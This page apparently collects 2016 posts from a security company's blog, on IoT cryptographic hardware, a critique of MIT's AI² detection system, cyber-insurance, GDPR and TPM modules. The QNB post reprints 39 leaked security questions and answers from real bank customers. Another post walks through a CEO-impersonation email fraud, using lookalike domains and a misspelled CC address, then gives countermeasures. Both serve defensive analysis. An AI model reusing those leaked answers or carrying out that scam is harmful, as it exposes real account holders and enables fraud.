La proliferación de dispositivos y plataformas de servicios IoT está siendo mucho más rápida que la adopción de medidas de seguridad en su ámbito. Ante la apremiante necesidad de mecanismos que garanticen la autenticación, integridad y confidencialidad, tanto de las comunicaciones como de los propios dispositivos, se tiende a trasladar las soluciones criptográficas contrastadas en la IT tradicional, como son los certificados digitales de clave pública sobre protocolos SSL/TLS. Seguimos avanzando en el estado del arte de las soluciones criptográficas para IoT. Hardware criptográfico para el IoT Es posible encontrar diferentes dispositivos criptográficos análogos al SIM y DNIe (que analizamos en la entrada anterior), tanto de clave simétrica como asimétrica y en diferentes formatos discretos. Destaca de forma especial la familia de hardware criptográfico de ATMEL, tanto por su facilidad de uso y documentación, como la accesibilidad a kits de desarrollo y librerías de código abierto. Tomaron especial relevancia cuando Sparkfun reunió varios de ellos en una tarjeta como accesorio de la placa BeagleBone, intensamente utilizada por Josh Datko en su libro de 2014 BeagleBone for Secret Agents. Ese año realizó una demostración en la prestigiosa conferencia DEF CON 22. Poco después comenzaron a aparecer gadgets similares, especialmente para placas como la Raspberry PI, por su accesibilidad al bus I2C y SPI por el que suelen comunicarse estos dispositivos. Y finalmente, volvió a ser Sparkfun quien reuniera los mismos elementos en una Crypto Shield para Arduino, que se puede utilizar en un UNO convencional. Junto a un reloj de tiempo real (RTC), incorpora cuatro elementos criptográficos: Un módulo TPM Atmel AT97SC3204T, para el cifrado y firma asimétrica RSA. Un autenticador Atmel ATAES132, para la autenticación y cifrado simétrico AES. Un autenticador Atmel ATSHA204, para la autenticación MAC/HMAC SHA-256. Un autenticador Atmel ATECC108, para la autenticación y cifrado mediante algoritmos de Curva Elíptica ECDSA. La presencia de un dispositivo criptográfico hardware basado en algoritmos de curvas hiperbólicas, concretamente de Curva Elíptica ECDSA, parece marcar el camino a seguir. Criptografía de Curvas Elípticas Las curvas hiperbólicas se conocen y estudian desde hace más de un siglo. Pese a que su aplicación en criptografía tuvo detractores en sus inicios, hoy en día es uno de los campos más prometedores dentro de las modernas técnicas de cifrado asimétrico. Si bien su complejidad teórica es relativamente elevada, presentan ciertas ventajas respecto a algoritmos tradicionales basados en la factorización, como RSA. Su implementación resulta muy eficiente por la propia aritmética de las curvas elípticas, y sobre todo, logra alcanzar niveles de seguridad óptimos con tamaños de clave muy reducidos. Esta propiedad hace de la criptografía con curvas elípticas ("ECC") la candidata ideal para ser implementada en dispositivos con escasa capacidad de cálculo, como los que nos encontramos en el ecosistema del IoT. A día de hoy, los algoritmos de curva elíptica están ampliamente recogidos en las principales regulaciones y certificaciones de ámbito internacional. De hecho, el software criptográfico más popular, OpenSSL soporta los algoritmos de curva elíptica ECDH y ECDSA para el intercambio de claves, cifrado y firma digital, desde su versión v0.9.8 mediante una amplia variedad de curvas. Pueden consultarse con el comando: openssl ecparam -list_curves Siendo ya los algoritmos ECC plenamente compatibles con la mayoría de servidores y navegadores del mundo web, reputadas entidades de certificación como DigiCert, Entrust, GlobalSign y especialmente Symantec, disponen de certificados raíz firmados con algoritmos ECC, así como de plenas capacidades para su emisión y distribución. Aunque el primer uso a gran escala de la criptografía de curva elíptica lo encontramos en la cripto-divisa Bitcoin, que desde su aparición en 2009 utiliza ECDSA para la firma de transacciones. Dispositivos IoT La necesidad de disponer de capacidades criptográficas en mundo del IoT, está llevando a los fabricantes ha incluir hardware específico en dispositivos de propósito general destinados al ecosistema de makers. Uno de los primeros en hacerlo fue la italiana Axel Electtronica, que en su Smarteverything consigue reunir sobre el esquema de un Arduino M0+ un gran número de sensores, destacando un receptor GPS y un módulo de red inalámbrico SIGFOX (868 Mhz), junto a un Crypto-Authenticator Atmel SHA204a. En esta misma línea, la matriz oficial de Arduino ha anunciado un nuevo modelo especialmente pensado para el IoT conocido como MKR1000, que entre otras muchas características como un módulo de red WIFI 802.11 b/g/n, contará con un Crypto-Authenticator de Curva Elíptica Atmel ECC508a. Aunque las fechas iniciales de comercialización apuntaban hacia febrero de 2016, todavía no hay ningún anuncio oficial al respecto, más allá del reto lanzado junto a Microsoft. A la tendencia natural de facilitar mecanismos de conexión inalámbrica, se le suma ahora, la de incluir elementos de autenticación criptográfica. Todavía pasará algún tiempo hasta que esta práctica se extienda de forma generalizada, hasta que se convierta en un requisito imprescindible. Mientras esto ocurre, será habitual conectarlos de forma discreta, como módulos independientes. Esto es posible agracias a los accesibles estándares de comunicación que utilizan, generalmente un bus I2C o SPI, y la abundante documentación que publican los fabricantes. Prácticamente cualquier sistema o plataforma que disponga de un bus I2C puede incorporar hardware criptográfico muy fácilmente; por ejemplo, todas las basadas en el entorno Arduino mostradas en la siguiente tabla: En la siguiente entrega ahondaremos en otros aspectos interesantes de la criptografía y el hardware para IoT. * Seguridad criptográfica en IoT (I) * Seguridad criptográfica en IoT (II) * Seguridad criptográfica en IoT (III) * Seguridad criptográfica en IoT (IV) * Seguridad criptográfica en IoT (V) * Seguridad criptográfica en IoT (y VI) Jorge Rivera jorge.rivera@11paths.com
5 de mayo de 2016
El MIT presenta una inteligencia artificial que predice el 85% de los ataques... pero que no es tan artificial
Se ha publicado en bastantes medios que el MIT ha presentado un sistema de supuesta inteligencia artificial que detecta el 85% de los ataques. Se habla de que es tres veces mejor que “el resto” y que reduce en 5 el número de falsos positivos. Se intuye pues un gran avance de la inteligencia artificial conseguido por científicos de renombre. Pero como de costumbre, el diablo está en los detalles. Veamos lo que dice el documento científico más que los medios. Lo han bautizado AI². Y no porque sea una inteligencia artificial superior, sino porque junto con la AI (Artificial Intelligence), existe un importante grado de "Analyst Intuition", esto es, un ser humano que clasifica, analiza, vela por el bueno funcionamiento del sistema y potencia y mejora los resultados. ¿Es trampa introducir a un analista para mejorar sistemas de inteligencia artificial? Ni mucho menos. De hecho, los analistas siempre deben estar ahí cuando se trata de extraer y aprovechar información de los datos. Lo que han hecho en el MIT es mejorar el trabajo de estos analistas. Que no es poco, pero es necesario dejar claro que el trabajo realizado por el MIT (y una startup llamada PatternEx) no supone una mejora "per se" del aparataje matemático tras la inteligencia artificial como tal, sino de una sustancial mejora de la interacción entre el analista y los algoritmos de machine learning para que el humano se sienta cómodo, su trabajo repercuta eficazmente en los algoritmos, y así estos funcionen de forma óptima. El sistema Hoy por hoy, la inteligencia artificial se identifica mucho con la minería de datos, y a su vez, con la moda del big data. Muchos disponen de bases de datos gigantes, pero eso no es big data. Eso es una base de datos gigante donde buscar (que por otro lado, no tiene nada de malo si es lo que se quiere). Solo podrá asegurar que aprovecha su big data quien realice una eficaz minería de datos aplicando técnicas de machine learning, por ejemplo, y podrá exhibir su éxito mucho más incluso quien aproveche esta información para detectar patrones con la mínima interacción humana. Como colofón, quien sea capaz de predecir tendencias será quien explote eficazmente el big data. Muchos sistemas se encuentran en alguno de estos estadios más o menos avanzados pero, incluso asentados en alguno de ellos, lo estará de forma precaria si el coste en falsos positivos o en infraestructura no lo hace sostenible. Este es, a grandes rasgos, el panorama. Lo que presenta el MIT es data mining con técnicas de marchine learning más que conocidas (de hecho, el propio documento dice "state of the art machine learning"). Lo cierto es que parece que no se innova en la inteligencia artificial. Este vídeo lo resumen muy bien. Se trata de un sistema de aprendizaje continuo con cuatro componentes clave: Una plataforma de análisis de datos. Aquí se toma la información en bruto, se procesa… nada raro. Un sistema detector de anomalías o casos atípicos (aprendizaje no supervisado). Aquí es donde se pone el mayor énfasis matemático, pero por combinación de técnicas conocidas. Trata de traducir las anomalías en probabilidades que superen un umbral. Un mecanismo para obtener feedback por parte de un humano. Aquí también es donde se apoya buena parte de la investigación, introduciendo y homogeneizando el concepto de "scoring" para que el analista pueda clasificar eficazmente sin sesgos. Un sistema de aprendizaje supervisado (que mejora continuamente gracias a la entrada del analista). Fuera de formalismos, el sistema es relativamente sencillo. En general, existen dos métodos de marchine learning: el supervisado, donde se sabe qué se debe buscar, (por ejemplo malware y goodware) y se trata de buscar reglas generales o elementos (características) que definan estas clases. Por otro lado, el no supervisado, donde no se conoce qué se busca (no está "etiquetado"), sino que se intenta detectar qué características definen grupos más o menos homogéneos, por ejemplo. Este sistema lo que hace es tomar los datos en bruto y pasarlos por un sistema no supervisado, o sea, no sabe lo que busca exactamente, solo que sea una anomalía. Trazar una línea entre lo normal y anormal sin saber en base a qué. Esto habitualmente es muy tendente a falsos positivos que deben ser validados por analistas (sobre todo, cuando las anomalías ocurren en un porcentaje muy pequeño con respecto a los datos obtenidos). Hasta aquí, este modelo de tratamiento de datos se lleva a cabo en muchos sistemas. Reducir el coste humano en este proceso se busca desde siempre. Por ejemplo, es habitual en las casas antivirus intentar reducir al máximo en análisis manual y construir en lo posible sistema de machine learning lo más preciso posible que derive en el menor número de muestras que llegan a un analista humano. Cuando el analista saca nuevas conclusiones, el sistema se retroalimenta con mejores reglas para intentar que no se vuelvan a necesitar sus servicios. Hasta aquí, el MIT no ha innovado demasiado. Lo que en realidad revela este sistema de IA² es un mecanismo inteligente para ponérselo más fácil a estos analistas. Lo que a nuestro juicio resulta innovador es esta frase extraída del documento: "Combinamos tres sistemas de detección de anomalías: Replicator Neural Networks, Density-based outlier analysis y Matrix Decomposition-based outlier analysis". Todas técnicas ya conocidas destinadas a reducir el número de supuestas anomalías (o singularidades) que más tarde, un analista tendrá que validar… con lo que en realidad, no son tres técnicas sino cuatro porque el analista, al final de la cadena (o en el medio, según se vea como algo cíclico) es que el juzga finalmente. De hecho, no deberíamos centrar tanto el discurso del MIT en el porcentaje de detección o predicción (aunque el uso de uno u otro verbo importe) sino en su verdadero punto fuerte: presentar al analista una información mucho más masticada y digerible: muchas menos alertas, mucho mejor presentadas. El grueso del documento está centrado en cómo han conseguido que se presente poca información, y muy homogénea. ¿Resultado? Gracias a IA², el analista es capaz de analizar y clasificar un número abarcable de anomalías de forma correcta al día. Esto es, un sistema de machine learning supervisado (sí que se sabe qué se clasifica) que se retroalimenta a su vez, con lo que los resultados mejoran ostensiblemente en el tiempo. Así, entre una búsqueda de anomalías eficaz; una presentación adecuada y suficientemente escueta para el analista; y un tratamiento eficiente de su feedback con más machine learning; se obtiene el resultado en el titular: un 85% de detección (o predicción, no queda claro), lo que significa ser 3.41 veces mejor y 5 menos veces falsos positivos a la hora de procesar millones de líneas de logs. Pero... ¿mejor con respecto a qué? Comparación de IA2 contra un machine learning no supervisado simple. El "presupuesto" es en realidad el número de alertas que digiere al día el sistema o el analista según el caso. La comparación de ser 3.41 veces mejor es curiosa. ¿Mejor que qué? En este caso, mejor que los métodos no supervisados tradicionales… Y esto, parece, no tiene excesivo mérito. Los métodos tradicionales no supervisados no son muy buenos en cuestión de detección o aprendizaje de ataques de este tipo, de ahí que también recurran a analistas para mejorarlo. Con lo que la comparación quizás resulte injusta. Conclusiones Aunque el machine learning se utilice en el campo de la inteligencia artificial, este sistema tiene más de machine learning tradicional y minería de datos que de inteligencia artificial como el imaginario colectivo pueda suponer. En estos casos, la figura del analista resulta poco menos que imprescindible, desde siempre. Desde la concepción y puesto a punto del sistema (donde un experto analista debe aconsejar y guiar a los entrenadores de algoritmos en el caso de análisis supervisado) hasta las fases de continua mejora y puesta a punto. Ya sea con las técnicas de inteligencia visual donde la manera en la que se representan los datos pueden hacer que, de un vistazo en apenas un segundo, un analista concluya algo que matemáticamente resultaría complejo; ya sea con el sistema propuesto por el MIT, donde se apunta a descongestionar al analista y recoger inteligentemente su clasificación final. No podemos pensar en el big data como un maremágnum de información automatizada y complejo aparataje matemático, porque perderá su objetivo si los atacantes (que al fin y al cabo son humanos) conocen cómo esconderse (en el caso del malware, por ejemplo) o las anomalías son tan escasas que pasan desapercibidas para cualquier sistema analítico. El big data y su explotación será tan bueno como los humanos que lo operan y, si somos los suficientemente hábiles como para estrechar el alcance de toda esta información lo suficiente para que quepa en nuestra capacidad humana, tomaremos lo mejor de la base de datos y se aprovechará al máximo. Al fin y al cabo, el juego del atacante y defensor, por muchas capas de abstracción, inteligencia artificial, big data y otras palabras de moda que se interpongan entre ellos, no deja de ser una lucha entre capacidades humanas. Sergio de los Santos ssantos@11paths.com @ssantosv
4 de mayo de 2016
![[Nuevo informe] “Ciberseguros: la transferencia del ciber-riesgo en España”](https://media.telefonicatech.com/telefonicatech/uploads/2021/1/6312_blog_informe_ciberseguros_ES.jpg)
[Nuevo informe] “Ciberseguros: la transferencia del ciber-riesgo en España”
Descárgate aquí el informe completo Ayer presentamos en Madrid en el Aula Magna del Instituto de Empresa, a los medios y analistas del sector, el primer informe elaborado conjuntamente con THIBER, sobre la transferencia de riesgos cibernéticos a través de las ciberpólizas en España. Participan en la elaboración del estudio algunas de las más importantes compañías del sector asegurador, tecnológico y de consultoría como son AIG, AON, K2 INTELLIGENCE, MARSH, MINSAIT y TELEFÓNICA con la colaboración del INSTITUTO DE EMPRESA. Este documento de estudio se ha realizado con el objetivo de cubrir una necesidad del mercado para gestionar el riesgo en ciberseguridad por medio de seguros de protección. » Ya puedes descargártelo desde la web de ElevenPaths. Las nuevas amenazas asociadas al entorno digital, la interconectividad y la digitalización del tejido empresarial español constatan la necesidad de un cambio de paradigma. El propio sector asegurador, los proveedores de servicios de Ciberseguridad y de asesoramiento en riesgos, la Administración Pública, así como el resto del sector empresarial deben ser los protagonistas de la gestión integral de los ciberincidentes, que tan sólo en 2015 aumentaron un 180% en España. De esta forma, deberá existir una colaboración continua entre los departamentos de siniestros de las aseguradoras, empresas tecnológicas especializadas y los departamentos TIC de las compañías aseguradas. Para ello será imprescindible contar con un documento que sirva como herramienta actualizada de base de análisis y que a la vez recoja propuestas de trabajo común. Ahí es, precisamente, donde este nuevo informe hará las veces de documento de referencia para el futuro inmediato. El mensaje general del evento señalaba al mercado de los ciberseguros en España como un mercado en auge, siendo productos que permiten mejorar el nivel de ciberseguridad tanto a nivel empresarial como a la propia Administración y que, con toda seguridad, van a dar mucho que hablar a corto y medio plazo. Es responsabilidad de todos los actores garantizar su consolidación. »Descárgate el nuevo informe “Ciberseguros: la transferencia del ciber-riesgo en España”. Más información en: elevenpaths.com
29 de abril de 2016
![[New report] “Cyber-insurance: cyber risk transfer in Spain”](https://media.telefonicatech.com/telefonicatech/uploads/2021/1/6310_blog_informe_ciberseguros_EN.jpg)
[New report] “Cyber-insurance: cyber risk transfer in Spain”
Donwload the full report here Yesterday we presented to the media and industry analysts the first report on the cyber risks transfer through cyber policies in Spain, prepared in conjunction with THIBER. It took place in the IE University’s Aula Magna, Madrid. Some of the most important companies in technology, insurance and consulting sectors such as AIG, AON, K2 INTELLIGENCE, MARSH, MINSAIT and TELEFÓNICA in collaboration with the IE University, took part in its production. This document study was conducted with the aim of meeting a market need to manage cybersecurity risk through insurance protection. » Download now the full report from our web ElevenPaths The new threats related to the digital environment, the interconnectivity and the digitization of the Spanish business network prove the need for paradigm shift. The cyber security and risk consultancy providers, the public administration, the insurance sector itself, as well as the rest of the business sector should advocate the cyber incidents integral management, which according to data from INCIBE, increased 180 percent in Spain in 2015 alone. Thus, there must be a continuous collaboration between the emergency departments of insurance companies, specialized technology companies and ICT departments of insured companies. For that, it will be essential to have a document that would serve as a based on analysis up-to-date tool, and, at the same time, would gather up common work proposals. This is where this new report will become the reference document for the immediate future. The overall message of the event pointed at Spanish cybersecurity market as a booming market, offering products that improve cybersecurity both at corporate and the administrational level and, there is no doubt that it will give plenty to talk about in the short and medium term. It is the responsibility of all stakeholders to ensure its consolidation. » Download now the full report “Cyber-insurance: cyber risk transfer in Spain″ More information: elevenpaths.com
29 de abril de 2016
Estudio de contraseñas cognitivas en la filtración de datos del Banco Nacional de Catar (QNB)
Cada vez que se produce una filtración de datos sensibles de usuario con contraseñas (en plano o reversibles) de por medio, alguien suele analizar cuáles y con qué frecuencia se utilizan. Siempre ganan "123456", "password" o similares. En el caso del reciente filtrado de datos del banco QNB (Qatar National Bank), lo hemos analizado desde otro punto de vista: las contraseñas "cognitivas", esas preguntas que se suelen hacer para recuperarlas y que sirven habitualmente como puerta de atrás para muchos ataques. Hace poco se ha hecho público un filtrado de 1.4 gigabytes de datos de lo que ha resultado un ataque a QNB, el banco nacional de Catar. Al margen de todo el resto de información que aparece en la base datos (más que jugosa, entre ella bastantes tarjetas de crédito), nos ocupamos ahora de las contraseñas cognitivas. No están ni mucho menos desterradas. Las contraseñas cognitivas son esas preguntas supuestamente personales, que te permitirán recuperar la contraseña de un servicio si la has perdido. Las típicas son "¿Cuál es el apellido de soltera de tu madre?", "¿Cómo se llama tu mascota?"... y similares genialidades. Sirven para "demostrar que eres tú" a quien solicita un cambio de contraseña, algo que de base, traslada el riesgo desde una contraseña a un dato personal probablemente deducible o incluso directamente público. Este método siempre ha sido mala idea, pero hoy por hoy, gracias a la exhibición que realiza el usuario medio de su vida privada y gustos en redes sociales, lo es más. Históricamente han servido para conseguir acceso a cuentas de correo de famosos (recordemos el caso Paris Hilton, Sarah Palin o Scarlett Johansson) y millones de usuarios anónimos. Además están en periodo de extinción entre los servicios que se toman en serio la seguridad. Estas preguntas se plantean principalmente en el proceso de creación de una cuenta de cualquier tipo. Puede encontrarse predeterminada o configurarla el propio usuario. En el caso de esta filtración del banco, parece que los usuarios podían elegirlas, lo que permite además analizar qué tipo de preguntas o temas escogen como "pista" para ellos mismos. Como ejercicio en este sentido, hemos analizado los datos de la filtración de QNB y el resultado no deja de ser curioso. Hemos encontrado dos grupos de datos: 39 preguntas y respuestas en claro elegidas por los usuarios "VIP" con su respectiva respuesta que reproducimos a continuación. Los datos son públicos desde la filtración y entre estos usuarios hay perfiles tan curiosos como espías (al menos así los califica el propio banco), políticos de Medio Oriente, policía, servicios especiales, periodistas de Al Jazeera, personal de otros bancos... question:ville de naissance?; answer:el biar; question:where i grew up ;answer:ballinteer; question:what is my age? ;answer:26; question:Favourite Pet? ;answer:Harvey; question:my name ;answer:khalaf; question: alex school;answer:voltaire; question:job ;answer:presenter; question:whats ur yahoo pin ;answer:yahoo ; question:jjjj ;answer:kkkk; question:cat ;answer:toyota; question:what is your color ;answer:red; question:c'est repare ;answer:c'est ok; question:country ;answer:avezzano; question:what is ur ;answer:hazem zoom; question:football and birthday ;answer:foot; question:je merite ;answer:no; question:WHAT IS YOUR FAVORITE CITY ;answer:RAMALLAH; question:TOOTS ;answer:my number; question:my wifes name ;answer:Kerry; question:Didier hint ;answer:Venus; question:What is your husband's nick name ;answer:Ba; question:WHAT IS MY MOTHER NAME ;answer:FATIMA; question:A;cigarette ;answer:555; question:mothers maiden name ;answer:Screech; question:car; ;answer:lexus; question:what is your daughter's name? ;answer:tanu; question:Your mother maiden name ;answer:Neale; question: what is your bank ;answer:qnb; question:my s mom ;answer:cora; question:who am i ;answer:roc; question:teacher ;answer:angelina; question:truck ;answer:ford150; question:dogs name ;answer:herman; question:what is your place of birth? ;answer:tuzla; question:rs28 ;answer:dannyc; question: A;wife;s name ;answer:carole; question:father's name ;answer:claude; question:chien ;answer:u;ysse; queston:A;golf ;answer:clubs; Quizás unas 40 muestras no sean representativas, pero llama la atención cómo los usuarios han asimilado las preguntas "típicas" y las han hecho suyas. Si les dan a elegir, repiten los patrones impuestos desde siempre por los servicios en la red… el nombre de soltera de la madre, mascotas, gustos, lugar de nacimiento… todos datos muy fácilmente deducibles o con un rango de error muy pequeño con fuerza bruta (¿cuál es tu color favorito?). Muy pocos echan mano de la imaginación. Por otro lado existe, en la misma filtración, otro fichero con las preguntas de usuarios "no VIP", del banco. Usuarios corrientes. En este caso, la respuesta no está en texto claro y no se ha tenido acceso aún. Pero hemos estudiado las preguntas. Contamos con 106634 preguntas y usuarios, eliminando algunas que no hemos podido decodificar por el uso de caracteres no latinos. Las hemos clasificado libremente por temática. Por ejemplo, buscando "pet" para cualquier pregunta relacionada con mascotas, o "mother" para preguntas del tipo "what is the maiden name of my mother" y sus variantes… intentando aglutinar así todo tipo de preguntas en una misma temática, puesto que cada uno lo ha escrito de una forma, grafía, estilo e incluso sintaxis diferente. Algunas preguntas están redactadas en francés, aunque la inmensa mayoría usa el inglés. Los porcentajes pueden no ser del todo ajustados puesto que puede haber temáticas que se solapen (cumpleaños de la mascota, por ejemplo). Y estos son los resultados. Un 35,32% apela al nombre de alguien. Un 7,69% se acuerda de su madre. Un 4,90% lo asocia con su día de nacimiento. Un 4,46% recuerda una "primera vez". Un 4,17% habla de sus mascotas. Un 4,10% se refiere a algo de los coches. Un 3,81% recuerda algún dato de su esposa o marido. Un 3,03% se acuerda de su padre. Un 2,66% habla de nombres o fechas de su hijo. Un 2,09% del apellido de soltera. Un 2,07% de algo "favorito". Con esta muestra, más allá de la anécdota, en realidad se pretende dar una idea de los elementos entorno a los que construimos nuestras contraseñas o las salvaguardamos. Parece claro que asociamos habitualmente la custodia de unos datos valiosos (una cuenta de un banco) a nuestros seres o recuerdos queridos. A ellos se dedican buena parte de las veces las contraseñas pero más aún estas preguntas cognitivas que sirven de pista. La razón es sencilla: son datos que no son muy cercanos y por tanto no vamos a olvidar. ¿Qué mejor fórmula para definir algo que se nos ha dicho que sirve como recordatorio? Evidentemente, este resultado puede estar sesgado por el tipo de datos filtrados y el perfil de usuarios, idioma, cultura… pero puede ser representativo. ¿Soluciones? Por definición, no es sensato supeditar el acceso a información privada al conocimiento de una serie de datos que no lo son. La solución es mentir si nos obligan a usar esas contraseñas cognitivas, empleando cadenas aleatorias a modo de contraseñas que, junto con la real del servicio, serán almacenadas en un buen gestor de contraseñas (sabiendo que, si se almacena bien la real, ni siquiera se necesitarán las cognitivas). Sergio de los Santos ssantos@11paths.com @ssantosv
27 de abril de 2016
Social engineering is more active than ever
The fact that Social Engineering has been the easiest method used by the scammers is not new. What we are going to describe in this blog today has been mentioned in some relevant Security reviews and newspapers, but at Elevenpaths, we are still surprised how easy this is happening. A few months ago, our customers in the Middle East asked us how to overcome the so-called C-level scam (or Business E-Mail Scams as baptised by the FBI or also known as the “Fake President” fraud). For the most basic scam, the “bad guy” should need to know the following information: If a company (let’s call it acme.com) is going through a merger or it has in mind acquiring a company (information obtained over the news, twitter comment insight, general gossip ...). Let’s call this company Muntaleyxp. C-level members and associated domains of the company (not mandatory). Let’s assume miky.wunderbalr@acme.com. Financial controllers or under C-level people in the company. Information can be gathered through Linkedin for example. Let’s assume tom.xly@acme.com. If the merger or acquisition process is done through a third company, find out one of the most relevant person in this company (let’s call it Kmiop). Let’s assume dan.panly@kmiop.com. With this information the scam occurs as described below: If the scammer has accessed Miky’s email account though a Trojan for example, it is even easier. But let’s assume it is not the case. If the domain of the company has a letter you can trick such an “l” or “m” ... then register a new domain and use it to send the main email. If not, then he/she can use a Gmail account. For example: miky.wunderbalr@acne.com. miky.wunderbalr@gmail.com. Send the email to tom.xly@acme.com and put dan.panly@kmiop.com in CC (it can even be the real domain but ensuring Dan does not receive the email [misspell it] avoiding he will trigger the alarm and hoping Tom will not contact Dan). Many variants can be used (such as Dan is also part of the scam [this time do not misspell it] and he will provide the bank account details) to perform the scam, but the general idea is there. The receiver (Tom) will be surprised with such message that he may act and do the transfer! From Elevenpaths we have five suggestions to overcome this problem: Easiest and obvious one: Pick up the phone and ask the C-Level executive about his/her e-mail. A technical one with its limitations: Try to set-up incoming email rules trying to cover as many misspelling options with C-Level executive names & surnames (with any associated domain), and blocking them. C-Level executive: Miky Wunderbalr (authorised e-mail: miky.wunderbalr@acme.com). niky.wunderbalr, miky.wunderba1r, miky_wunderbalr, miky-wunderbalr, wunderbalr.niky. Along with an e-mail filtering system against identity theft in the Company (acme) properly condivd with its associated SPF, DKIM y DMARC registers. A second technical option related to a second/simultaneous factor of authentication: Our Latch product will provide the same concept we used to watch in those Hollywood movies such as Crimson Tide (with Denzel Washington and Gene Hackman) where two keys are needed from different people in order to launch a missile. If we assume “the missile” is the bank transfer itself, then Tom can authorise the transfer and Miky, with his latched account active is also required to do the transfer. Miky will ensure that his latched account is never active during “strange” hours. The costly one: Have a “powerful” cybersecurity insurance covering social Engineering attacks. Any C-level manager should avoid sharing any news about possible company merger or acquisitions. Just remember: The weakest link is always us! sebastian.garcia@11paths.com pablo.alarcon@11paths.com
22 de abril de 2016
Los atentados aceleran la nueva regulación
Tras los últimos atentados de Paris y Bruselas se han acelerado los procesos para la aprobación de la nueva Regulación General sobre Protección de Datos (GDPR) por parte del Parlamento Europeo. Este nuevo reglamento no nace como muchos piensan tras los últimos acontecimientos terroristas, de hecho ya lleva 4 años en el horno del parlamento evolucionando a partir del anterior reglamento que pertenece a la era de Windows 95 y lógicamente a dia de hoy ha quedado ambiguo y obsoleto. Esta nueva regulación engloba las necesidades actuales adaptándolas a un estándar común que permita a todos los miembros que lo pongan en práctica operar con las mismas directivas en materia de protección y que sin duda van a ser más estrictas y severas que las actuales. Al igual que pretende Telefonica en su nueva política de devolución del control a los usuarios de sus datos personales, la reforma aprobada quiere hacer lo mismo con los ciudadanos europeos, donde podremos decidir gracias a la nueva definición de consentimiento del uso o no de nuestros datos. ¿Pero en que cambia esta regulación con respecto a la actualmente vigente? Fundamentalmente en todo pero cabe destacar ciertos aspectos que son determinantes: Hacer valer el derecho al olvido, mediante la rectificación o supresión de sus datos personales. Aprobación o rechazo claro por parte de cada usuario para el consentimiento al tratamiento de sus datos personales. El derecho a poder trasladar los datos a otro proveedor de servicios. El derecho a ser informado sobre un posible pirateo de sus datos personales. Disponer de un lenguaje claro y comprensible sobre las cláusulas de privacidad. Incremento de las multas que pueden alcanzar el 4% de la facturación global de las empresas en caso de infracción sobre estos datos. ¿Habrá normas específicas en caso de necesidad judicial o policial? El nuevo texto si incluye unos mínimos sobre el uso de datos con estos fines e incluso a su intercambio dentro de la UE pero siempre con el objetivo de proteger, ya sea a las víctimas, acusados o testigos, clarificación de sus derechos, imposición de penas y establecer límites en la cesión de datos para prevención, investigación, detección y enjuiciamiento de delitos. Lucha antirrerorista Esta aprobación ha facilitado que también se haya incluido el plan PNR (Registro internacional de pasajeros aéreos). Un plan que si nace para luchar contra la amenaza terrorista que ya se considera un problema que afecta a toda la Unión y no solo a los países afectados por los últimos atentados. Esta nueva norma permitirá registrar hasta 19 datos de los pasajeros que usen el transporte aéreo dentro de la Unión o que salgan fuera de ella, pero deberá excluir de estos aquellos referentes a aspectos concretos su religión, orientación o vida sexual, raza o etnia, opinión política, salud o su relación con sindicatos y podrán mantenerlos almacenados para su uso durante 5 años. Esta aprobación incluye a todos los países de la UE excepto A Reino Unido e Irlanda que mantienen una política particular y no se verán afectados y Dinamarca que aún no tiene decidido su implantación. Todas estas medidas no hacen más que reforzar la necesidad de tomar medidas para controlar la información que manejamos y evitar que esta caiga en manos ajenas o su exposición innecesaria. Desde ahora los estados miembros tienen 2 años para su implantación con lo que la daremos como un hecho desde mediados de 2018. ¿Controlamos realmente los datos personales? Lo cierto es que cada vez más pero todavía hay que trabajar más sobre ello. Si observamos documentos de muchos repositorios web o de los adjuntos de correo electrónico, podremos encontrar información que vulnera estos principios examinando sus metadatos, encontraremos información del autor, fecha, ruta de almacenamiento, mail y un sinfín de datos que lanzamos al exterior sin garantizar la privacidad de esta información, por no hablar de posicionamiento GPS que queda almacenado en muchas imágenes. Afortunadamente hay cada vez más soluciones que ayudan a esta tarea y facilitan el cumplimiento normativo y calidad garantizando uno de los derechos fundamentales e inalienables de nuestra sociedad, la privacidad. *También te puede interesar: La UE aprueba el nuevo reglamento para reforzar la protección de datos en internet Día de la Protección de Datos: SandaS GRC SmartID y SealSign en Mobile World Congress 2015 Para más información: elevenpaths.com
20 de abril de 2016
Seguridad criptográfica en IoT (I)
La proliferación de dispositivos y plataformas de servicios IoT está siendo mucho más rápida que la adopción de medidas de seguridad en su ámbito. Ante la apremiante necesidad de mecanismos que garanticen la autenticación, integridad y confidencialidad, tanto de las comunicaciones como de los propios dispositivos, se tiende a trasladar las soluciones criptográficas contrastadas en la IT tradicional, como son los certificados digitales de clave pública sobre protocolos SSL/TLS. Pero el principal problema que presenta este acercamiento radica en el almacenamiento de los certificados en el dispositivo. En la IT tradicional es generalmente el sistema operativo el encargado de esta misión. Tanto Microsoft Windows, como Mac OS X o Linux/UNIX y sus variantes móviles (Windows Phone, iOS y Android) cuentan con una herramienta software para este fin (KeyStore), que generalmente viene precargada con numerosos certificados de confianza, al menos, para el fabricante del sistema operativo. Componente de configuración de certificados en Windows Criptografía en la IT Pero estos almacenes software presentan varias debilidades por su propia naturaleza, así que en entornos de IT donde la seguridad es una prioridad, la tendencia actual es utilizar un elemento criptográfico hardware llamado TPM (Trusted Platform Module). Las especificaciones técnicas del módulo TPM están recogidas en un estándar abierto definido por el Trusted Computing Group (TCG); una organización sin ánimo de lucro integrada por los principales fabricantes de software y hardware, cuyo objeto es definir, desarrollar y promover especificaciones y estándares abiertos de "computación segura o confiable". El TCG comenzó su labor en 2003 sucediendo a la Trusted Computing Platform Alliance creada en 1999. Desde sus inicios estuvieron rodeados de una gran controversia. La comunidad de software libre, con Richard Stallman a la cabeza, resultó especialmente crítica, ya que su motivación original era la protección de la propiedad intelectual mediante la gestión de derechos digitales o DRM. El módulo TPM está basado en un cripto-procesador (chip discreto) que proporciona capacidades de seguridad avanzadas. Permite generar y almacenar claves criptográficas y realizar operaciones sobre ellas, de forma que las claves nunca abandona el chip, que se encuentra específicamente protegido contra ataques físicos (tampering). Producidos por diferentes fabricantes (Infineon, Atmel, STMicro, Broadcom, etc.), junto a las protecciones contra ataques físicos, incorporan mecanismos de seguridad para soportar ataques lógicos. El NIST los acredita con el nivel 4 de la certificación FIPS 140-2. La utilización de módulos TPM presenta restricciones en varios países como China, Rusia, Bielorusia y Kazakhstan. Muchos equipos de sobremesa, portátiles de gama empresarial y servidores, integran un módulo TPM de fábrica (es estiman en más de 300 millones), aunque también es posible incorporarlo de forma separada a través del conector que expone el bus LPC en una amplia variedad de equipos domésticos posteriores a 2004. Los módulos TPM pueden almacenar de forma segura una gran variedad de objetos: certificados digitales, claves asimétricas, claves simétricas, credenciales, cookies, firmas, registros de auditoría, etc. 